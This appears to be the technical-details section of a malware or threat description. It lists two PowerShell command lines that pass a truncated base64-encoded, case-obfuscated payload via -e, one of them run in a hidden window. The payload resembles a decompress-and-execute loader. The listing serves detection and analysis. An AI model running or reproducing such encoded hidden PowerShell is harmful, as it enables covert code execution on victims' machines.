Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQBXAC0ATwBCAEoAZQBjAFQAIABJAG8ALgBzAFQAcgBFAGEATQBSAEUAQQBEAGUAUgAoACgAIABuAGUAVwAtAE8AQgBKAGUAYwBUACAAcwB5AHMAVABFAG0ALgBJAG8ALgBjAE8AbQBQAHIARQBzAHMAaQBvAG4ALgBEAGUAZgBMAGEAVABFAH...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQBXAC0ATwBCAEoAZQBjAFQAIABJAG8ALgBzAFQAcgBFAGEATQBSAEUAQQBEAGUAUgAoACgAIABuAGUAVwAtAE8AQgBKAGUAYwBUACAAcwB5AHMAVABFAG0ALgBJAG8ALgBjAE8AbQBQAHIARQBzAHMAaQBvAG4ALgBEAGUAZgBMAGEAVABFAH...' (with a hidden window)